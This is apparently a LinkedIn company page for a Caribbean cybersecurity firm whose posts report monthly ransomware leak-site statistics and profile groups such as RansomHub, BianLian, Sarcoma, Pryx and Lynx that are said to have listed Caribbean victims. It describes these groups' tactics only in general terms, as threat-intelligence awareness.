Here are the Top 10 Ransomware Attack/Leak Publication Stats for October 2024. October 2024 saw a significant uptick in leak listings and publications with 516 listings/leak publications by 40 groups, up from 357 listings/publications by 34 groups in September 2024. For the 4th month in a row, the RansomHub (RaaS) group has again been the top threat group with 85 listings/ publications for October. It should be noted that these listings and publications are victims who have not paid the ransoms. Victims who have paid are not listed and no public record is kept. Interestingly enough, even after a major interruption by Law Enforcement at least 3 times this year, LockBit remains (somewhat) active with 3 listings/publications for October. New group Sarcoma listed 25 victims for October, one of which operates within the Caribbean. New group Playboy Locker listed one victim (government agency) but then decided to sell their source code and close operations. 5 new groups spotted in October 2024: -Sarcoma (25 listings) -Nitrogen (22 listings) -Interlock (4 listings) -Orca (3 listings) -Playboy Locker (1 listing) Full stats in the comments section. #ransomwareattacks #dataleaks #ransomhub #lockbit
Computer Forensics and Security Institute (CFSI)
Computer and Network Security
Chaguanas, Chaguanas 799 followers
Penetration Testing. Vulnerability Assessments. Digital Forensics. Purple Teaming. Cybersec Consultancy and Training.
About us
CFSI offers advanced Cyber Security services including Vulnerability Assessment, Penetration Testing, Digital Forensics and Network Security Training.
- Website
-
http://www.cfsi.co
External link for Computer Forensics and Security Institute (CFSI)
- Industry
- Computer and Network Security
- Company size
- 2-10 employees
- Headquarters
- Chaguanas, Chaguanas
- Type
- Educational
- Founded
- 2011
- Specialties
- Penetration Testing, Digital Forensics, CyberSec Training, Certified Ethical Hacker Training, CCNA Training, VUlnerability Assessment, Incident Response Training, Certified EC-Council Instructor, and Authorized Training Centre
Locations
-
Primary
Chaguanas, Chaguanas 500618, TT
Employees at Computer Forensics and Security Institute (CFSI)
-
Leslie Laloo
Mobile Forensic Specialist | Data Recovery Analysis | Digital Forensics Investigator | Mobile Device Security Consultant | Marketing | Community…
-
Shiva Parasram
Enterprise Risk Consultant | Ransomware, Breach and Dark Web Researcher | Published InfoSec Author | C|CISO | Penetration Tester | Forensic…
-
Savi Parasram
Administrative Manager
-
MAYANK RAMGOOLIE
Oil and Gas Industrial E&I Tech | Senior Educator | Electrician | Solar Tech |OPITO CERTIFIED | IT Certified | Music Specialist
Updates
-
🚨 🚨The Caribbean has seen 5 major ransomware/ data leak listings in the past 2 months.🚨🚨 Ransomware Groups/ Threat Actors: -BianLian -BlackLock/ El Dorado -Sarcoma -Pryx -Lynx Sectors Affected: -Insurance -Retail and Distribution -Banking and Finance -Government -IT Service Provider Countries Affected: -Jamaica -Barbados -Trinidad & Tobago -Bermuda -Aruba -Bahamas #ransomwareattacks #dataleaks #darkweb #caribbean #aruba #barbabos #bermuda #bahamas #jamaica #trinidadandtobago
-
🚨 BlackLock (Formerly El Dorado) Ransomware group 🚨 has listed a large organization from Aruba operating in the Retail and Distribution (Food) sector has been listed on their Dark Web leak site. El Dorado Ransomware Group Additional info : -Mainly targets Windows and VMware ESXi systems but I'd also known to affect Linux systems also. -First seen: early 2024. -Type: RaaS (Ransomware-as-a-Service). -El Dorado rebranded into BlackLock in September 2024. -Possible past affiliation with MetaEncryptor and LostTrust groups. -Victims listed as at October 18th 2024: 38 -Extortion type: Double (encryption and data leak). -Industries/sectors attacked: Healthcare, Retail, Distribution, Food and Beverage, Manufacturing, Legal, Construction, Government, IT and more. #ransomwareattack #eldorado #blacklock #aruba #caribbean
-
🚨 New Ransomware Group Sarcoma🚨 has listed a company from Bermuda operating within the Finance and Banking sector as a victim on their Dark Web leak site. A countdown timer with approximately 7 days is currently running. Sarcoma Ransomware Group Info : -First seen: October 2024 -Victims listed as at October 18th, 2024: 33 -Extortion type: Triple (Direct extortion, encryption and data leak). -Information on the Sarcoma "About Us" page on the dark web states "Our mission is to show the world how important it is to keep data safe. If you see your company on our website, it means that security was low. We invite access brokers, interested parties, aggrieved employees of companies to co-operate. Together we can be stronger and richer." -Industries/sectors attacked: IT and Cyber security, Banking and Finance, Insurance, Construction, Retail and Wholesale and more. #ransomwareattack #caribbean #Bermuda
-
Here are the top 10 Ransomware attack/leak publication stats for September 2024. There were approximately 357 publications by 37 monitored groups. Ransomhub is again at the top for yet another month with increased activity. Full stats in the comments. #ransomwareattacks #ransomhub
-
🇧🇧Pryx Ransomware threat actor allegedly breaches Barbados Government 🇧🇧. Pryx has listed for sale, a dump titled "Tax and Tourism fees service dump (230 GB)" on it's dark web leak site. See screenshots for details. PII listed allegedly includes Passports and National ID numbers. Five sample files have also been uploaded (which have not been downloaded or viewed). Additional info about Pryx: -First seen: Between April - July 2024 -Has stated the following on their dark web leak page: "Pryx is definitely not a ransomware group. Pryx is a cybercriminal or threat actor, whatever you want to call it. Pryx might soon get into hacktivism, bcuz why not." -Victims listed as at October 1st 2024: 9 -Extortion type: Double (encryption and data leak). -Extortion amounts: up to $10 million. -Industries/sectors attacked: Government and education. #dataleak #barbados #caricom #pryx
-
🚨 🚨 Ransomware Attack/ Data Leak on Caribbean Insurance Company 🚨 🚨 The BianLian Ransomware group published a post on their dark web leaksite about an alleged data leak on an insurance company operating within several Caribbean islands including Jamaica, the Bahamas and Trinidad & Tobago. The data volume is listed at 3.5 TB and the data description lists clients and employees PII (Personally Identifiable Data) and accounting and policy data. About the BianLian Ransomware group: - First dark web leak post made in August 2022. - Has leaked the data of over 450 victims in the past 2 years. - Target sectors: Health and Medical, Financial, Construction, Manufacturing, Critical Infrastructure, Robotics, Food, Aviation and more. - Known RaaS (Ransomware-as-a-Service) group. - Possible association with Makop Ransomware group. - Known for extortion without encryption meaning that they do not encrypt victim files but instead focus on extortion via data leak if ransom is not paid. - Has exfiltrated well over 8TB of data from victims in the past 2 years. - Recently discovered to have been using Microsoft Storage Explorer and AzCopy tools to exfiltrate stolen data which is transferred to Microsoft Storage Blob containers for storage. (Most likely as Microsoft services are less likely to be blocked). - Known to gain access via RDP (Remote Desktop Protocol), phishing, ProxyShell and VPN exploitation and also via Access Brokers followed by the planting of backdoors and remote access software. - Use PowerShell and Commands shell to disable and evade anti-virus and anti-malware protection (specifically Microsoft Defender) - Uses popular tools for network scanning and enumeration including Advanced Port Scanner, SharpHhares and PingCastle. - Uses PsExec with compromised credentials for Lateral Movement. #ransomwareattack #dataleak #bianlian #trinidad #jamaica #bahamas
-
New Ransomware Group Observed - Part 6. 🚨Lynx Ransomware Group.🚨 This group has allegedly breached a large organization which operates in several Caribbean islands (including 🇧🇧Barbados, 🇯🇲Jamaica and 🇹🇹Trinidad) and Latin American countries. (The name of the company will not be divulged publicly or privately as this post is solely for awareness purposes). Though only in operation for 2 months (under this group) they do appear to be experienced and highly-organized with a focus on larger, profitable targets. Type: Ransomware-as-a-Service (RaaS) Possible rebranding of/association with Inc Ransomware (RaaS) group. Noticeably active since July 2024 Encryption Type: AES Sectors of Interest: Engineering, Construction, Manufacturing, Technology and Finance Dark web /leak site victim count: 24. Known for double extortion. (Encryption of systems and leaking of data). Lists company income on each leak post. Victims are usually large profitable organizations with income ranging from $5 Million to $700 Million. #ransomwareattacks #newransomwaregroup
-
Here are the Ransomware group stats for August 2024. A significant jump in publications by new Ransomware-as-a-Sevice (RaaS) group Ransomhub which could be attracting Lockbit affiliates. I counted approximately 420 listings by 37 groups for August. Keep in mind these listings only show the companies which did Not pay the ransoms. See the full list in the comments section. #ransomwareattacks